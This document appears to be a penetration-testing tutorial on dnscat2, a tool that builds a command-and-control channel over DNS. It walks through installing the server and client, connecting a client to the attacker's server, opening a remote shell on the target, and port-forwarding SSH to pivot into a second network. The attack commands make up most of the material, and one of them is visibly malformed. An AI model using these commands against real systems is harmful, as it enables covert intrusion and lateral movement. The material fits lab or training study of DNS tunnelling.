dnscat2: Command and Control over the DNS

In this article, we learn DNS tunnelling through an amazing tool i.e. DNScat2

Table of Content :

·         Introduction to DNS

·         Introduction to DNScat

·         Installation

·         DNS tunnelling

·         Conclusion

Introduction to DNS

The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it's conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site's content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses the port 53.

Introduction to DNScat

DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don't need have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in packet log.

DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.

The client is intended to be kept running on a target machine. It's written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which are then directed to the legitimate DNS server for that domain (which you, apparently, have control of).

The server is intended to be kept running on a definitive DNS server. It's developed in ruby, and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. If gets other traffic it will automatically disregard it but, however, it can also advance it upstream.

Installation

Run the following git command to download dnscat2 :

git clone https://github.com/iagox86/dnscat2.git

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :

gem install bundler

bundle install

Once everything is done, the server will run with the following command :

ruby dnscat2.rb

Similarly, download dnscat2 in the client machine too.  And use make command to compile it with server, as shown in the image below :

To establish a connection between client and server, use the following command :

./dnscat2 –dns-server=192.168.174.131,port=53

Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.

To interact with the said session type the following command :

session -i 1

As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.

Following will be the response on the client side of the ping command.

Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.

To interact with the shell session that is opened in a new terminal, type following set of commands :

windows

session -i 2

Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.

DNS tunnelling

DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.

For DNS tunnelling, type the following command :

listen 127.0.0.1:888 10.0.0.10:22

Now you can try and connect to the SSH port with the following command :

ssh cell@127.0.0.1 -p 888

Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :

As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have you session on the DNScat2 server :

dnscat2.exe –dns+server+192.168.174.131,port+53

Once the above command is executed, you will have a new session that you can access with the following set of commands :

sessions

session -i 2

And once you have access of the session, you can run any command.

Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.